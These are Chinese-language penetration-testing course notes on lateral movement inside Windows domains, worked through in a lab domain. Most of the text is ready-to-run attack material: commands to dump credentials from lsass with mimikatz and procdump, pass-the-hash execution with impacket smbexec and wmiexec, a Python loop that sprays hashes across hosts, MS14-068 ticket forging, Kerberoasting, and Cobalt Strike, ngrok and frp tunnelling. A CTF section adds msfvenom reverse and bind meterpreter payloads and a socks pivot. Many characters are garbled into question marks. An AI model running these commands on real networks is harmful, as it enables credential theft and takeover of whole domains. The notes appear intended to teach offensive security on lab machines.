内网安全“小迪安全课堂笔记”域横向
內網安全
- 內網安全-域環境&工作組&局域網探針方案
- 基本認知
- 域環境與工作組的區別
- 環境靶機
- 案例 1-基本信息收集操作演示
- 案例 2-網絡信息收集操作演示
- 案例 3-用戶信息收集操作演示
- 案例 4-憑據信息收集操作演示
- 計算機用戶 HASH,明文獲取-mimikatz(win),mimipenguin(linux)
- 計算機各種協議服務口令獲取-LaZagne(all),XenArmor(win)
- 案例 5-探針主機域控架構服務操作演示
- 涉及資源
- 域橫向批量at&schtasks&impacket
- 案例 1-橫向滲透明文傳遞 at&schtasks
- 案例 2-橫向滲透明文 HASH 傳遞 atexec-impacket
- 案例 3-橫向滲透明文 HASH 傳遞批量利用-綜合
- 案例 4-橫向滲透明文 HASH 傳遞批量利用-升級版
- 內網安全-域橫向 smb&wmi 明文或 hash 傳遞
- 案例 1-Procdump+Mimikatz 配合獲取
- 案例 2-域橫向移動 SMB 服務利用-psexec(官方三方),smbexec(三方)
- 案例 3-域橫向移動 WMI 服務利用-cscript,wmiexec,wmic
- 案例 4-域橫向移動以上服務 hash 批量利用-python 編譯 exe
- 涉及資源:
- 內網安全-域橫向 PTH&PTK&PTT 哈希票據傳遞
- 案例 1-域橫向移動 PTH 傳遞-mimikatz
- 案例 2-域橫向移動 PTK 傳遞-mimikatz
- 案例 3-域橫向移動 PTT 傳遞-ms14068&kekeo&本地
- 案例 4-國產 Ladon 內網殺器測試驗收
- 域橫向CobaltStrike&SPN&RDP
- 案例1-域橫向移動RDP傳遞-Mimikatz
- 案例2-域橫向移動SPN服務,探針,請求,破解,重寫
- 域橫向移動測試流程?把梭-CS初體驗
- 涉及資源∶
- 內網安全-域橫向內網漫游 Socks 代理隧道技術
- 案例 1-內網穿透 Ngrok 測試演示-兩個內網通訊上線
- 案例 2-內網穿透 Frp 自建跳板測試-兩個內網通訊上線
- 案例 3-CFS 三層內網漫游安全測試演練-某 CTF 線下 2019
- 內網安全-域橫向網絡&傳輸&應用層隧道技術
- 案例 1-網絡傳輸應用層檢測連通性-檢測
- 案例 2-網絡層 ICMP 隧道 ptunnel 使用-檢測,利用
- 案例 3-傳輸層轉發隧道 Portmap 使用-檢測,利用(??????)
- 案例 4-傳輸層轉發隧道 Netcat 使用-檢測,利用,功能
- 案例 5-應用層 DNS 隧道配合 CS 上線-檢測,利用,說明
- 域橫向 CS&MSF 聯動shell
內網安全-域環境&工作組&局域網探針方案
基本認知
DMZ,是英文“demilitarized zone”的縮寫,中文名稱為“隔離區”,也稱“非軍事化區”。它是為了解決安裝防火墻后外部網絡的訪問用戶不能訪問內部網絡服務器的問題,而設立的一個非安全系統與安全系統之間的緩沖區。該緩沖區位于企業內部網絡和外部網絡之間的小網絡區域內。在這個小網絡區域內可以放置一些必須公開的服務器設施,如企業Web服務器、FTP服務器和論壇等。另一方面,通過這樣一個DMZ區域,更加有效地保護了內部網絡。因為這種網絡部署,比起一般的防火墻方案,對來自外網的攻擊者來說又多了一道關卡。
域控制器DC就是域的管理服務器
域是windows下的一種統一化管理的方式,明確一點,一個電腦可以用多個賬號登錄,并且還可以本地用戶和域用戶兩種方式登錄,沒有域環境和有域環境的認證方式不同
域環境與工作組的區別
1、域和工作組適用的環境不同,域一般是用在比較大的網絡里,工作組則較小,在一個域中需要一臺類似服務器的計算機,叫域控服務器,其他電腦如果想互相訪問首先都是經過它的,但是工作組則不同,在一個工作組里的所有計算機都是對等的,也就是沒有服務器和客戶機之分的,但是和域一樣,如果一臺計算機想訪問其他計算機的話首先也要找到這個組中的一臺類似組控服務器,組控服務器不是固定的,以選舉的方式實現,它存儲著這個組的相關信息,找到這臺計算機后得到組的信息然后訪問。
2、工作組是一群計算機的集合,它僅僅是一個邏輯的集合,各自計算機還是各自管理的,你要訪問其中的計算機,還是要到被訪問計算機上來實現用戶驗證的。而域不同,域是一個有安全邊界的計算機集合,在同一個域中的計算機彼此之間已經建立了信任關系,在域內訪問其他機器,不再需要被訪問機器的許可了。
拓展資料
1、域英文叫DOMAIN——域(Domain)是Windows網絡中獨立運行的單位,域之間相互訪問則需要建立信任關系(即Trust Relation)。信任關系是連接在域與域之間的橋梁。當一個域與其他域建立了信任關系后,2個域之間不但可以按需要相互進行管理,還可以跨網分配文件和打印機等設備資源,使不同的域之間實現網絡資源的共享與管理。
2、工作組(Work Group)是局域網中的一個概念。它是最常見最簡單最普通的資源管理模式,就是將不同的電腦按功能分別列入不同的組中,以方便管理。
環境靶機
案例 1-基本信息收集操作演示
旨在了解當前服務器的計算機基本信息,為后續判斷服務器角色,網絡環境等做準備。
systeminfo 詳細信息
net start 啟動服務
tasklist 進程列表
schtasks 計劃任務
systeminfo 詳細信息
net start 啟動服務,可以大致判斷當前服務器在域內扮演什么角色。
tasklist 進程列表
schtasks 計劃任務,這里加載不出來,權限不夠,需要提權。
案例 2-網絡信息收集操作演示
旨在了解當前服務器的網絡接口信息,為判斷當前角色,功能,網絡架構做準備
ipconfig /all 判斷存在域-dns
net view /domain 判斷存在域
net time /domain 判斷主域
netstat -ano 當前網絡端口開放
nslookup 域名 追蹤來源地址
旨在了解當前服務器的?絡接?信息,為判斷當前??,功能,?絡架構做準備
ipconfig /all 判斷存在域-dns
有域
沒有域
net view /domain 判斷存在域
net time /domain 判斷主域(域控)
獲得?個計算機名字,我們可以通過ping命令來獲取IP地址
netstart -ano 當前主機?絡端?開放,判斷角色
查看主機名,也可能判斷角色
nslookup 域名 追蹤來源地址
案例 3-用戶信息收集操作演示
旨在了解當前計算機或域環境下的用戶及用戶組信息,便于后期利用憑據進行測試
系統默認常見用戶身份:
Domain Admins:域管理員(默認對域控制器有完全控制權)
Domain Computers:域內機器
Domain Controllers:域控制器
Domain Guest:域訪客,權限低
Domain Users:域用戶
Enterprise Admins:企業系統管理員用戶(默認對域控制器有完全控制權)
主要針對Domain Admins/Enterprise Admins
相關用戶收集操作命令:
whoami /all 用戶權限
net config workstation 登錄信息
net user 本地用戶
net localgroup 本地用戶組
net user /domain 獲取域用戶信息
net group /domain 獲取域用戶組信息
wmic useraccount get /all 涉及域用戶詳細信息
net group “Domain Admins” /domain 查詢域管理員賬戶
net group “Enterprise Admins” /domain 查詢管理員用戶組
net group “Domain Controllers” /domain 查詢域控制器
域用戶與本地用戶的區別?
net user查看本地用戶,net user domain查看域用戶
GOD\webadmin(域用戶)進行計算機管理操作時,需要驗證賬號密碼才能操作,這個就是因為AD?錄來操控的,域成員主機權限不夠。
切換至administrator本地用戶,可以直接操作。現在?的是??的賬號,??域賬號。
相關?戶收集操作命令:
Whoami /all ?戶權限
net config workstation 登錄信息
net user 本地信息
net localgroup 本地?戶組
net user /domain 獲取域?戶信息
net group /domain 獲取域?戶組信息
wmic useraccount get /all 涉及域?戶詳細信息
net group “Domain Admins” /domain 查詢域管理員賬戶
通過這些收集,我們可以得到域?戶名,如果再得到密碼,就可以登錄操控了
案例 4-憑據信息收集操作演示
旨在收集各種密文,明文,口令等,為后續橫向滲透做好測試準備
計算機用戶 HASH,明文獲取-mimikatz(win),mimipenguin(linux)
上傳mimikatz到當前服務器
當前用戶是GOD\webadmin,是?法運?的,權限不?,權限提升。
提權后執行成功
獲取明文密碼和hash
mimipenguin(Linux)只?持部分Linux,同樣也需要高權限用戶執行
計算機各種協議服務口令獲取-LaZagne(all),XenArmor(win)
Netsh WLAN show profiles
Netsh WLAN show profile name=“無線名稱” key=clear
1.站點源碼備份文件、數據庫備份文件等
2.各類數據庫 Web 管理入口,如 PHPMyAdmin
3.瀏覽器保存密碼、瀏覽器 Cookies
4.其他用戶會話、3389 和 ipc$連接記錄、回收站內容
5.Windows 保存的 WIFI 密碼
6.網絡內部的各種帳號和密碼,如:Email、VPN、FTP、OA 等
LaZagne(all)?持全系統,但垃圾
上傳運行
XenArmor(win)
上傳后執行
其他軟件需要配置環境路徑
結果,此為免費版本,付費可查看完整密碼,也可找破解版。
獲取的這些密碼可作為爆破字典,內網中大多密碼重復使用幾率都比較高。
案例 5-探針主機域控架構服務操作演示
為后續橫向思路做準備,針對應用,協議等各類攻擊手法
探針域控制器名及地址信息
net time /domain nslookup ping
探針域內存活主機及地址信息
nbtscan 192.168.3.0/24 第三方工具
?個?牌?具,既不免殺,還得下載
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr “TTL=” 自帶內部命令-推薦
?帶內部命令,不?免殺,缺點,顯示內容沒有那麼多,只有?標的地址
nmap masscan 第三方 PowerShell 腳本 nishang empire 等
使?第三?的?具掃描可能會被監控到,從?被攔截
nishang舉例:已上傳到服務器
#導入模塊 nishang
Import-Module .\nishang.psm1
#設置執行策略 ,解決上圖報錯
Set-ExecutionPolicy RemoteSigned
#獲取模塊 nishang 的命令函數
Get-Command -Module nishang
#獲取常規計算機信息
Get-Information
#端口掃描(查看目錄對應文件有演示語法,其他同理)
Invoke-PortScan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort
#其他功能:刪除補丁,反彈 Shell,憑據獲取等
探針域內主機角色及服務信息
利用開放端口服務及計算機名判斷
核心業務機器:
1.高級管理人員、系統管理員、財務/人事/業務人員的個人計算機
2.產品管理系統服務器
3.辦公系統服務器
4.財務應用系統服務器
5.核心產品源碼服務器(自建 SVN、GIT)
6.數據庫服務器
7.文件或網盤服務器、共享服務器
8.電子郵件服務器
9.網絡監控系統服務器
10.其他服務器(內部技術文檔服務器、其他監控服務器等)
涉及資源
http://unixwiz.net/tools/nbtscan.html
https://github.com/samratashok/nishang
https://github.com/AlessandroZ/LaZagne
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/huntergregal/mimipenguin/releases/
https://nagareshwar.securityxploded.com/download-softwares/
https://xenarmor.com/allinone-password-recovery-pro-software/
https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug提取碼:taqu
域橫向批量at&schtasks&impacket
傳遞攻擊是建?在明?和hash獲取介質上的?種攻擊。
2008 r2 webserver 域內 web 服務器 本地管理員賬號密碼 : .\administraotr:admin!@#45 當前機器域用戶密碼 : god\webadmin:admin!@#45 ------------------------------------- 2003 x86 fileserver 域內文件服務器 本地管理員賬號密碼 : administrator : admin 當前機器域用戶密碼 : god\fileadmin : Admin12345 ------------------------------------- 2008 r2 x64 dc god.org 主域控機器 域管賬號密碼: God\administrator : Admin12345 ------------------------------------- 2012 sqlserver 域內數據庫服務器 本地管理員賬號密碼 : .\administrator:admin!@#45 當前機器域用戶密碼 : god\dbadmin:admin!@#45 ------------------------------------- w7 x64 mary-pc 域內個人機 本地管理員賬號密碼 : .\mary : admin 當前機器域用戶密碼 : god\mary : admin!@#45 ------------------------------------- w8.1 x64 jack-pc 域內個人機 本地管理員賬號密碼 : .\jack : admin 當前機器域用戶密碼 : god\boss : Admin12345案例 1-橫向滲透明文傳遞 at&schtasks
**在拿下一臺內網主機后,通過本地信息搜集收集用戶憑證等信息后,如何橫向滲透拿下更多的主機?**這里僅介紹 at&schtasks 命令的使用,在已知目標系統的用戶明文密碼的基礎上,直接可以在遠程主機上執行命令。
獲取到某域主機權限->minikatz 得到密碼(明文,hash)->用到信息收集里面域用戶的列表當做用戶名字典->用到密碼明文當做密碼字典-》嘗試連接->創建計劃任務(at|schtasks)->執行文件可為后門或者相關命令。
利用流程
[at] & [schtasks] 都是基于定時任務的攻擊
at < Windows2012
schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立 ipc 連接:用戶需為本地用戶 copy add.bat \\192.168.3.32\c$ #復制文件到其 C 盤 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #創建 adduser 任務對應執行文件 schtasks /run /s 192.168.3.32 /tn adduser /i #運行 adduser 任務 schtasks /delete /s 192.168.3.21 /tn adduser /f#刪除 adduser 任務
案例 2-橫向滲透明文 HASH 傳遞 atexec-impacket
impacket:https://gitee.com/RichChigga/impacket-examples-windows
https://www.freebuf.com/sectool/175208.html # 參考文獻
atexec是impacket其中的一個工具,還?帶提權。優點:?便快捷,可以?持hash。缺點:第三??具,會受到殺毒軟件或防護的影響。如果 ?標主機有殺軟或防護的話,要對該軟件進?免殺。
案例 3-橫向滲透明文 HASH 傳遞批量利用-綜合
webServer已經拿到權限
獲取密碼
獲得本機密碼
探針存活主機
使?批處理來跑多個IP地址使?固定的密碼賬號,來執?個whoami,ips.txt就是剛才收集到存活主機 的IP地址
通過返回信息來判斷能否連接
192.168.3.29采?的是同密碼
繼續拿下這個主機,重復之前操作。豐富密碼字典。
之后拿密碼字典去攻擊域控
?戶名也可以變。以上bat缺點只有?個變量。可以?bat實現多變量,也可以使?python寫,然后使?第三?庫,打包成.exe
案例 4-橫向滲透明文 HASH 傳遞批量利用-升級版
承接案例3-python版
net use \192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin
#pip install pyinstaller
#pyinstaller -F fuck_neiwang_001.py ?成可執?EXE
代碼:
執行,這里的腳本源碼時單線程,可以做多線程等優化,運行更便捷。
net use查看鏈接情況,
內網安全-域橫向 smb&wmi 明文或 hash 傳遞
知識點1:
Windows2012以上版本默認關閉wdigest,攻擊者?法從內存中獲取明?密碼。這種情況mimkatz只能獲取hash。
Windows2012以下版本如安裝KB2871997補丁,同樣也會導致?法獲取明?密碼
針對以上情況,我們提供了4種?式解決此類問題
1.利?哈希hash傳遞(pth,ptk等)進?移動
2.利?其他服務協議(SMB,WMI等)進?哈希移動
3.利?注冊表操作開啟Wdigest Auth值進?獲取
4.利??具或第三?平臺(Hachcat)進?破解獲取
Hashcat破解獲取Windows NTML
Hash hashcat -a 0 -m 1000 file --force
知識點2:
Windows系統的LM HASH及NTLM Hash加密算法,個?系統在Windows vista后,服務器系統在 Windows 2003以后,認證?式均為NTLM Hash。
案例 1-Procdump+Mimikatz 配合獲取
procdump是Windows官?的?具
如果上傳Minmiktz上傳后被殺,可以使?Procdump+Mimikatz這個?法 .
procdump 配合 mimikatz
procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz 上執行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
運?procdump在當前?錄下?成lsass.dmp?件
然后再在mimi上使?命令還原出來密碼
在?標主機上?proc?成?件,然后再在本地上?Mim還原出密碼
mimikatz上執?:
sekurlas::minidump lsass.dmp
sekurlas::logonPasswords full
能夠直接獲取明文-與mimikatz在服務器中運行結果一致。
案例 2-域橫向移動 SMB 服務利用-psexec(官方三方),smbexec(三方)
利用 SMB 服務可以通過明文或 hash 傳遞來遠程執行,條件 445 服務端口開放。
psexec 第一種:先有 ipc 鏈接,psexec 需要明文或 hash 傳遞
net use \192.168.3.32\ipc$ “admin!@#45” /user:administrator
psexec \192.168.3.32 -s cmd # 需要先有 ipc 鏈接 -s 以 System 權限運行
psexec 第二種:不用建立 IPC 直接提供明文賬戶密碼
官方 Pstools 無法采用 hash 連接
在官?下載pstools,上傳??標主機執行語句
執?命令,將前期信息收集到的ip地址,?戶名 ,密碼,反彈回cmd
基于Hash的:
執?時出現了問題,解決需要?到?個?官?的庫impacket的psexec,官方的不支持hash
反彈成功
非官方自帶-參考 impacket 工具包使用,操作簡單,容易被殺
smbexec 無需先 ipc 鏈接 明文或 hash 傳遞
smbexec god/administrator:Admin12345@192.168.3.21 smbexec ./administrator:admin!@#45@192.168.3.32 smbexec -hashes :$HASH$ ./admin@192.168.3.21 smbbexec -hashes :$HASH$ domain/admin@192.168.3.21 smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21鏈接目標主機域用戶administrator
鏈接目標主機本地用戶administrator
案例 3-域橫向移動 WMI 服務利用-cscript,wmiexec,wmic
WMI(Windows Management Instrumentation) 是通過 135 端口進行利用,支持用戶名明文或者 hash的方式進行認證,并且該方法不會在目標日志系統留下痕跡。
自帶 WMIC 明文傳遞 無回顯
目標主機原本是沒有1.txt
在當前主機上執?命令,等待連接
連接完畢后,在?標主機上連接的那個域主機上出現了1.txt
這個命令的弊端就是在當前主機沒有回顯,只有其他方式讀取目標主機生成的文件,比較尷尬。
自帶 cscript 明文傳遞 有回顯
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345需要借助?個wmiexec.vbs?件,在資源中有
執?命令,反彈cmd
套件 impacket wmiexec 明文或 hash 傳遞有回顯exe版本
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami" wmiexec god/administrator:Admin12345@192.168.3.21 "whoami" wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami" wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"
案例 4-域橫向移動以上服務 hash 批量利用-python 編譯 exe
pyinstaller.exe -F fuck_neiwang_002.py
import os,time ips={'192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.30','192.168.3.32' } users={'Administrator','boss','dbadmin','fileadmin','mack','mary','webadmin' } hashs={'ccef208c6485269c20db2cad21734fe7','518b98ad4178a53695dc997aa02d455c' } for ip in ips:for user in users:for mimahash in hashs:#wmiexec -hashes :hashgod/user@ipwhoamiexec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"print('--->' + exec + '<---')os.system(exec)time.sleep(0.5)涉及資源:
https://github.com/hashcat/hashcat
https://www.freebuf.com/sectool/164507.html
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/SecureAuthCorp/impacket
https://gitee.com/RichChigga/impacket-examples-windows
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://docs.microsoft.com/zhcn/sysinternals/downloads/procdump
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取碼:xiao
內網安全-域橫向 PTH&PTK&PTT 哈希票據傳遞
Kerberos 協議具體工作方法,在域中,簡要介紹一下:
- 客戶機將明文密碼進行 NTLM 哈希,然后和時間戳一起加密(使用krbtgt 密碼 hash 作為密鑰),發送給 kdc(域控),kdc 對用戶進行檢測,成功之后創建 TGT(Ticket-Granting Ticket).
- 將 TGT 進行加密簽名返回給客戶機器,只有域用戶 krbtgt 才能讀取 kerberos 中 TGT 數據
- 然后客戶機將 TGT 發送給域控制器 KDC 請求 TGS(票證授權服務)票證,并且對 TGT 進行檢測
- 檢測成功之后,將目標服務賬戶的 NTLM 以及 TGT 進行加密,將加密后的結果返回給客戶機。
PTH(pass the hash) #利用 lm 或 ntlm 的值進行的滲透測試
PTT(pass the ticket) #利用的票據憑證 TGT 進行的滲透測試 -基于Kerberos 協議
PTK(pass the key) #利用的 ekeys aes256 進行的滲透測試
PTH 在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接通過 LM Hash 和 NTLM Hash訪問遠程主機或服務,而不用提供明文密碼。
如果禁用了 ntlm 認證,PsExec 無法利用獲得的 ntlm hash 進行遠程連接,但是使用 mimikatz 還是可以攻擊成功。對于 8.1/2012r2,安裝補丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys代替 NT hash 來實現 ptk 攻擊,
總結:KB2871997 補丁后的影響
pth:沒打補丁用戶都可以連接,打了補丁只能 administrator 連接
ptk:打了補丁才能用戶都可以連接,采用 aes256 連接
https://www.freebuf.com/column/220740.html
PTT 攻擊的部分就不是簡單的 NTLM 認證了,它是利用 Kerberos 協議進行攻擊的,這里就介紹三種常見的攻擊方法:MS14-068,Golden ticket,SILVER ticket,簡單來說就是將連接合法的票據注入到內存中實現連接。
MS14-068 基于漏洞,Golden ticket(黃金票據),SILVER ticket(白銀票據)
其中 Golden ticket(黃金票據),SILVER ticket(白銀票據)屬于權限維持技術
MS14-068 造成的危害是允許域內任何一個普通用戶,將自己提升至域管權限。微軟給出的補丁是kb3011780
案例 1-域橫向移動 PTH 傳遞-mimikatz
mimikatz不僅可以獲取明文等信息,也可以進行pth等相關的攻擊。
嚴謹?點,LM和NTML最好都收集
下?這個命令是獲取aes256加密的
PTH ntlm 傳遞
未打補丁下的工作組及域連接:
先嘗試攻擊域控主機
直接連接域控主機是?法連接的
使?mimikatz進?攻擊
攻擊命令上并沒有指定IP地址,這是?種隨機攻擊,IP地址是前期信息收集的,連接時,可以遍歷IP地址, 看哪個有回顯。
攻擊成功反彈回來了?個cmd,在這個cmd中進?連接。
如果IP地址不識別,就換成計算機名
之后就和at schtasks?樣了,復制?件,執??件等 攻擊另外?臺主機
這?domain是?個?作組,直接連接到了主機的本地的Administrator
案例 2-域橫向移動 PTK 傳遞-mimikatz
PTK aes256 傳遞 - 必須打補丁才能使用
打補丁后的工作組及域連接:
彈出?個cmd窗?,嘗試連接域內主機
案例 3-域橫向移動 PTT 傳遞-ms14068&kekeo&本地
第一種利用漏洞:
能實現普通用戶直接獲取域控 system 權限
MS14-068 powershell 執行
1.查看當前 sid whoami/user
2.mimikatz # kerberos::purge//清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造
mimikatz # kerberos::list //查看當前機器憑證
mimikatz # kerberos::ptc 票據文件 //將票據注入到內存中
3.利用 ms14-068 生成 TGT 數據
ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 - p admin!@#45
4.票據注入內存
mimikatz.exe “kerberos::ptc TGT_mary@god.org.ccache” exit
5.查看憑證列表 klist
6.利用 dir \192.168.3.21\c$
演示
域內主機
記錄下sid值,
在域內主機mary上執?
?成TGT_mary@god.org.ccache
查看mary內與那些主機有鏈接產?的票據
為了防?影響我們的操作,刪除已有的票據
?mimi導?票據到內存,并且查看是否導?成功
連接域控主機
?IP地址連接錯誤,?計算機名
第二種利用工具 kekeo
1.生成票據
2.導入票據
3.查看憑證 klist
4.利用 net use 載入
dir \192.168.3.21\c$
第三種利用本地票據(需管理權限)
前提是當前主機與目標主機10小時內連接過,就存在票據。
總結:ptt 傳遞不需本地管理員權限,連接時主機名連接,基于漏洞,工具,本地票據
導出票據后,會導出到你當前執??錄,收集好票據
缺陷:ptt只能保持10個?時,如果能拿到10個?時內的憑據,可以成功
導?成功
案例 4-國產 Ladon 內網殺器測試驗收
信息收集-協議掃描-漏洞探針-傳遞攻擊等
我們打開Ladon的gui版本
掃描時,選擇的時OnlinePC(存活主機),會嘗試獲取存活主機
?命令?形式執?掃描存活主機
域橫向CobaltStrike&SPN&RDP
cs教程:https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf
案例1-域橫向移動RDP傳遞-Mimikatz
除了上述講到的IPC,WMI,SMB等協議的鏈接外,獲取到的明?密碼或HASH密?也可以通過、RDP協議 進?鏈接操作。
RDP協議連接:判斷對?遠程桌?是否開啟(3389端?)
RDP明?密碼鏈接
Windows:mstsc mstsc.exe /console /v192.168.3.21 /admin linux:rdesktop 192.168.3.21:3389RDP密文HASH鏈接
windows Server需要開啟 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默認開啟,同時如果Win 7 和windows Server 2008 R2安裝了2871997、2973351補丁也支持; 開啟命令∶ REG ADD"HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_ DWORD /d 00000000 /f 開啟后運行∶ mstsc.exe /restrictedatmin mimikatZ.exe privilege::debug sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"案例2-域橫向移動SPN服務,探針,請求,破解,重寫
https://www.cnblogs.com/backlion/p/8082623.htmo
探針:spn查詢是普通Kerberos票據的一部分的一部分,不會被防火墻等設備攔截。
spn只支持域內用戶,不支持本地用戶
固定查找
請求:
導出
?mimi導出剛才請求?成的票據,默認導出到mimi的目錄下
破解
破解得到?個密碼Admin12345
域控主機的環境信息
發現的確獲得sqlserver密碼
重寫
再將票據注入內存,進行之后操作。
域橫向移動測試流程?把梭-CS初體驗
此案例還原完整內網滲透流程
環境:cs部署到了外網服務器。目標域還是本機這幾臺虛擬機。
?概流程:
啟動-配置-監聽-執?-上線-提權-信息收集(?絡,憑證,定位等)-滲透
1.關于啟動及配置講解
2.關于提權及插件加載
3.關于信息收集命令講解
4.關于視圖?動化功能講解
客戶端連接團隊服務器
啟動團隊服務器,設定密碼,密碼再客戶端連接時要驗證
點擊客戶端連接
進?到了CS界?
配置監聽器可以區分那個是??的,監聽器就是配置?個??傳輸的管道
配置監聽器
點擊ADD可以增加監聽器,并且監聽器?持多種協議
點擊save保存
監聽狀態
?成后?,有多種后?,我們這?選擇Windows
綁定監聽器,這個后?觸發,就從當前的監聽器?
上傳到?標服務器
后?執?后,cs客戶端上線了?標服務器
點擊視圖,可以看到許多有?的信息,例如當前?戶和已知的拓撲圖
接下來進?提權操作
?帶的只有兩種提權?式
我們可以加載插件
上傳插件
載?成功后,發現提權?式變多了
選中payload和監聽器
開始攻擊,如果速度過慢,我們可以重新設置sleep
出現了?個system,提權成功
點擊insert進?終端執?命令
可以輸?help來查看有那些命令
信息收集
探針當前?絡環境
點擊view->Targets
獲得當前域控列表
有些dos命令不?持,我們可以調?shell來執?
通過mimi獲得的密碼可以列表化
選中主機來進?攻擊
嘗試連接
代理問題
?主?具可以上傳sadon
涉及資源∶
https://github.com/nidem/kerberoast
https://pan.baidu.com/s/1Vh4ELTFvyBhv3AvztfCw 提取碼∶xiao
https://github.com/pandasec888/taowu-cobalt-strike
https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q提取碼∶dtm2
https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取碼∶taqu
https://github.com/DeEpinGh0st/Erebus
https://github.com/rsmudge/ElevateKit
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/bluscreenofjeff/AggressorScripts
內網安全-域橫向內網漫游 Socks 代理隧道技術
必要基礎知識點:
1.內外網簡單知識
2.內網 1 和內網 2 通信問題,可以?代理解決.
3.正向反向協議通信連接問題
正向:指正?向連接,控制端連接被控制端
反向:指反?向連接,被控制端連接控制端
假如控制端是公?,被控是內?,如果,你直接去找在內?被控的是?法找到的。可以讓被控端 去找控制端
4.內網穿透代理隧道技術說明
隧道主要是解決流量分析?具,流量監控?具,防?墻相關過濾
代理主要解決?絡連通性問題
案例 1-內網穿透 Ngrok 測試演示-兩個內網通訊上線
實驗環境:兩個不同的內網(有網絡)實現穿透控制
1.注冊-購買-填寫-確認 http://www.ngrok.cc/
協議:http 本地端口:192.168.76.132:4444
2.測試:內?1執?后?-免費主機處理-內?2監聽-內?2接收器
協議要對應
攻擊機是?臺kali,在上?下載ngrok并且打開它,clientid為注冊后給的id
?標機只要訪問xioadiisec.free.idcfengye.com就可以連接到攻擊機kali
msf?成后?
?標機是win7,將msf的??上傳到?標機,在kali上監聽
在win7的?標機上執?后?,kali收到會話
并且在sunny上也看到流量在傳遞
案例 2-內網穿透 Frp 自建跳板測試-兩個內網通訊上線
自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務端-下載-解壓-修改-啟動(阿里云主機記得修改安全組配置出入口)
服務器修改配置文件 frps.ini:
[common]
bind_port = 6677
啟動服務端:
./frps -c ./frps.ini
2.控制端-下載-解壓-修改-啟動
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主機 ip
server_port = 6677 #frpc 工作端口,必須和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的 5555
remote_port = 6000 #服務端用 6000 端口轉發給本機
啟動客戶端:
./frpc -c ./frpc.ini
3.靶機運行 frp 即可
msf?成??
上傳??標主機。
msf監聽
?標機執???,上線
案例 3-CFS 三層內網漫游安全測試演練-某 CTF 線下 2019
來源 2019 某 CTF 線下賽真題內網結合 WEB 攻防題庫,涉及 WEB 攻擊,內網代理路由等技術,每臺服務器存在一個 Flag,獲取每一個 Flag 對應一個積分,獲取三個 Flag 結尾。
Target1:
探針目標-利用 WEB 漏洞(TP5_RCE)-獲取 webshell 權限-獲取 Flag-Target2
1.生成后門:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
2.接受反彈:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
3.信息收集及配置訪問
獲取網絡接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
4.利用本地代理接口訪問測試
設置瀏覽器代理進行訪問測試
linux:
配置 proxychains 后調用工具探針 Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:掃描主機檢測其是否受到數據包過濾軟件或防火墻的保護。
-sT:掃描 TCP 數據包已建立的連接 connect
windows:
利用代理工具 Proxifier 或 SocksCap64 載入代理進行進程訪問測試
Target2:
探針目標-利用 WEB 漏洞(SQL 注入)-后臺獲取 webshell 權限-獲取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #后臺
http://192.168.22.128/index.php?r=special #后門 shell
1.生成正向后門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.信息收集及配置訪問
獲取網絡接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
環境
開始
